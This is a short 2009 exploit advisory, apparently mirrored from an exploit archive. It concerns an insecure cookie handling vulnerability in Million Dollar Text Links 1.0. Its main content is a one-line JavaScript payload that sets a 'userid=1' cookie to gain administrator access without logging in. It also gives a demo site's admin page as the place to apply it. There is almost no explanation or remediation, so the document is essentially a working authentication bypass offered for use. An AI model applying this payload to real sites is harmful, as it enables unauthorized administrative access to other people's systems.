id: 5262
date: 05/26/2009
title: Million Dollar Text Links 1.x Insecure Cookie Handling Vulnerability
author: HxH
cves: 

====================================================================
Million Dollar Text Links 1.x Insecure Cookie Handling Vulnerability
====================================================================


----------------------------------------------------------------
Million Dollar Text Links Insecure Cookie Handling Vulnerability
----------------------------------------------------------------

Author.: HxH

---------------------------

Script.: Million Dollar Text Links 1.0
Home...: http://cmsnx.com/product.about.php?id=12

-------------------------------------------------

Exploit: javascript:document.cookie="userid=1; path=/";

-------------------------------------------------------

demo...: http://kalptarudemos.com/demo/million/admin.php

--------------------------------------------------------



#  0day.today [2023-03-22]  #